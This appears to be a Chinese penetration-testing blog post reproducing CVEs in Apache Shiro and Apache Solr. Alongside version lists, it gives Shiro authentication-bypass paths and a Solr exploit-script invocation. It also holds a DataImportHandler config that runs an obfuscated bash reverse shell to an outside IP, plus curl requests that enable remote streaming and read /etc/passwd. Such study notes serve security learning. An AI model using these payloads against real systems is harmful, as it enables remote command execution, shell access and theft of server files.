框架安全&CVE复现&Apache Shiro&Apache Solr

  • 框架安全&CVE复现&Apache Shiro&Apache Solr


    Apache Shiro:

    Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理

    判断:大多会发生在登录处,返回包里包含remeberMe=deleteMe字段

    漏洞:https://avd.aliyun.com/search?q=shiro

    Apache Shiro <= 1.2.4 默认密钥致命令执行漏洞【CVE-2016-4483】

    Apache Shiro < 1.3.2 验证绕过漏洞【CVE-2016-2807】

    Apache Shiro < 1.4.2 cookie oracle padding漏洞 【CVE-2019-12442】

    Apache Shiro < 1.5.2 验证绕过漏洞 【CVE-2020-1957】

    Apache Shiro < 1.5.3 验证绕过漏洞 【CVE-2020-11989】

    Apahce Shiro < 1.6.0 验证绕过漏洞 【CVE-2020-13933】

    Apahce Shiro < 1.7.1 权限绕过漏洞 【CVE-2020-17523】

    1、CVE_2016_4437 Shiro-550+Shiro-721
    
    
    
    2、CVE-2020-11989
    
    Poc:/admin/%20
    
    影响范围:Apache Shiro < 1.7.1
    
    https://github.com/jweny/shiro-cve-2020-17523
    
    
    
    3、CVE-2020-1957
    
    Poc:/xxx/..;/admin/
    
    影响范围:Apache Shiro < 1.5.3
    

    Apache Solr:

    Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。

    漏洞:https://avd.aliyun.com/search?q=solr

    远程命令执行RCE(CVE-2017-12629)

    远程命令执行XXE(CVE-2017-12629)

    任意文件读取AND命令执行(CVE-2019-17558)

    远程命令执行漏洞(CVE-2019-0192)

    远程命令执行漏洞(CVE-2019-0193)

    未授权上传漏洞(CVE-2020-13957)

    Apache Solr SSRF (CVE-2021-27905)

    1、远程命令执行RCE(CVE-2017-12629)

    Apache solr<7.1.0版本

    2、任意文件读取AND命令执行(CVE-2019-17558)
    Apache Solr 5.0.0版本至8.3.1
    
    https://github.com/jas502n/solr_rce
    
    D:\Python27\python.exe solr_rce.py http://123.58.236.76:50847 id
    
    3、远程命令执行漏洞(CVE-2019-0193)
    Apache Solr < 8.2.0版本
    <dataConfig>
      <dataSource type="URLDataSource"/>
      <script><![CDATA[
              function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");
              }
      ]]></script>
      <document>
        <entity name="stackoverflow"
                url="https://stackoverflow.com/feeds/tag/solr"
                processor="XPathEntityProcessor"
                forEach="/feed"
                transformer="script:poc" />
      </document>
    </dataConfig>
    
    4、Apache Solr 文件读取&SSRF (CVE-2021-27905)
    全版本官方拒绝修复漏洞
    1、获取数据库名
    http://47.94.236.117:8983/solr/admin/cores?indexInfo=false&wt=json
    2、访问触发
    curl -i -s -k -X $'POST' \
        -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
        $'http://47.94.236.117:8983/solr/demo/config'
    3、任意文件读取
    curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
    

   转载规则


《框架安全&CVE复现&Apache Shiro&Apache Solr》 Shmily 采用 知识共享署名 4.0 国际许可协议 进行许可。
 上一篇
APP攻防-微信小程序&解包反编译&数据抓包&APK信息资源提取 APP攻防-微信小程序&解包反编译&数据抓包&APK信息资源提取
APP攻防-微信小程序&解包反编译&数据抓包&APK信息资源提取 1、渗透角度:测试的app提供服务的服务器,网站,接口等,一旦这个有安全问题,被不法分子利用,相当于APP正常服务就会受到直接的影响! APK
2022-05-10
下一篇 
框架安全&CVE复现&Django&Flask&Node.JS&JQuery 框架安全&CVE复现&Django&Flask&Node.JS&JQuery
框架安全&CVE复现&Django&Flask&Node.JS&JQuery JavaScript-开发框架安全-Jquery&NodejQuery 1、cve_2018_9207
2022-04-23
  目录